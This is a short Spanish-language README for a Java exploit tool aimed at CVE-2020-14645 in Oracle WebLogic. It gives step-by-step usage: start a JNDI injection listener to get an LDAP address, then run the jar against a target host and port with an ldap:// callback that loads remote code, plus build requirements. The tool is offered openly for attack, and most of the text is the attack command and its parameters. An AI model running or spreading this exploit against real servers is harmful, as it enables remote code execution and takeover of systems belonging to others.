
Exploit basado en Java para CVE-2020-14645 que ataca el protocolo T3 de Oracle WebLogic con inyección JNDI para ejecución remota de código.
Primero use NDI-Injection-Exploit para escuchar y generar una dirección ldap.
java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]
-Tatget y -RMI son obligatorios, https puede usar el parámetro --SSL, -Port por defecto 7001.
Para compilarlo usted mismo, necesita agregar coherence.jar y wlfullclient.jar.